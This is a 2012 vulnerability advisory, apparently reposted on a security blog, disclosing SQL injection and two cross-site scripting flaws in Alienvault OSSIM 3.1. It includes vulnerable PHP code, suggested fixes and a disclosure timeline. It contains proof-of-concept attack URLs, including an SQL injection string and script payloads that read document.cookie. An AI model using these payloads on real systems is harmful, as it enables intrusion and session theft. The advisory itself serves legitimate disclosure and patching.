Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170
Skip to content

KORAMIS-ADV2012-002 - Alienvault OSSIM Open Source SIEM 3.1 Multiple security vulnerabilities

Advisory:
Alienvault OSSIM Open Source SIEM 3.1 Multiple security vulnerabilities
Advisory ID: KORAMIS-ADV2012-002
Contact. security@koramis.de
Author: Stefan Schurtz
Affected Software: Successfully tested on Alienvault Open Source SIEM 3.1 (32bit)
Vendor URL:
Vendor Status:
informed
EDB-ID: 18800
 
==========================
Vulnerability Description
==========================
 
Alienvault OSSIM Open Source SIEM 3.1 is prone to XSS and SQL-Injection vulnerabilities
 
==================
PoC-Exploit
==================

#### SQL-Injection ####

https://[target]/ossim/forensics/base_qry_main.php?clear_allcriteria=1&num_result_rows=-1&submit=Query+DB&current_view=-1&sort_order=time_d&time[0][0]=1=1) LIMIT 1--+&time[0][1]=%3E=&time[0][2]=04&time[0][3]=24&time[0][4]=2012&time[0][5]=3&time[0][6]=3&time[0][7]=3&time[0][8]=+&time[0][9]=+&time_range=today&hmenu=Forensics&smenu=Forensics

#### 01 - XSS ####

----- vuln code -----

The 'url' parameter on the top.php page is vulnerable to XSS. 
Authentication is needed.

if ($url != "")
{
        $url_check =
preg_replace("/.php.*/",".php",$url);
        if (!
file_exists($url_check))
        {
               
echo_("Can't access to $url_check for security reasons");
               
exit;
        }
}
 
----- PoC -----

https://[target]/ossim/top.php?option=3&soption=3&url='"</script><script>alert(document.cookie)</script>

#### 02 - XSS ####

----- vuln code -----

The 'time[0][0]' parameter on the base_qry_main.php and a wrong error handling makes
a XSS possible. Authentication is needed.

// includes/base_db.inc.php

if ((!$rs || $this->baseErrorMessage() != "") && $die_on_error) {
           
echo '</TABLE></TABLE></TABLE>
<FONT COLOR="#FF0000"><B>'
.
gettext("Database ERROR:") . '</B>' . $this->baseErrorMessage() . '</FONT>' . '<P><PRE>' . ($debug_mode > 0 ? ($this->lastSQL) . $limit_str : "") . '</PRE><P>';
           
die();
        } else {
            return $rs;
   }
}

----- PoC -----

https://[target]/ossim/forensics/base_qry_main.php?clear_allcriteria=1&num_result_rows=-1&submit=Query+DB&current_view=-1&sort_order=time_d&time[0][0]=<script>alert(document.cookie)</script>&time[0][1]=%3E=&time[0][2]=04&time[0][3]=24&time[0][4]=2012&time[0][5]=3&time[0][6]=3&time[0][7]=3&time[0][8]=+&time[0][9]=+&time_range=today&hmenu=Forensics&smenu=Forensics

======================
Solution/Workaround
======================

#### 01 - XSS ####

// top.php

if ($url != "")
{
        $url_check =
preg_replace("/.php.*/",".php",$url);
        if (!
file_exists($url_check))
        {
               
echo_("Can't access to ".htmlentities($url_check)." for security reasons");
               
exit;
        }
}

#### 02 - XSS  ####

// includes/base_db.inc.php

if ((!$rs || $this->baseErrorMessage() != "") && $die_on_error && $debug_mode > 0) {
           
echo '</TABLE></TABLE></TABLE>
<FONT COLOR="#FF0000"><B>'
.
gettext("Database ERROR:") . '</B>' . $this->baseErrorMessage() . '</FONT>' . '<P><PRE>' . ($debug_mode > 0 ? ($this->lastSQL) . $limit_str : "") . '</PRE><P>';
           
die();
        } else {
            return $rs;
   }
}

====================
Disclosure Timeline
====================

24-Apr-2012 - vendor informed (contact form)
27-Apr-2012 - vendor informed (contact form)

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz (KORAMIS Security Team).

===========
References
===========

http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-002.txt

Trackbacks

www.websecuritywatch.com on : PingBack

Unfortunately, the contents of this trackback can not be displayed.

www.websecuritywatch.com on : PingBack

Unfortunately, the contents of this trackback can not be displayed.

www.websecuritywatch.com on : PingBack

Unfortunately, the contents of this trackback can not be displayed.

www.websecuritywatch.com on : PingBack

Unfortunately, the contents of this trackback can not be displayed.

Comments

Display comments as Linear | Threaded

No comments

Add Comment


To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA 1CAPTCHA 2CAPTCHA 3CAPTCHA 4CAPTCHA 5


Textile-formatting allowed
You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.
Form options
Imprint | Contact | Privacy Statement

Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170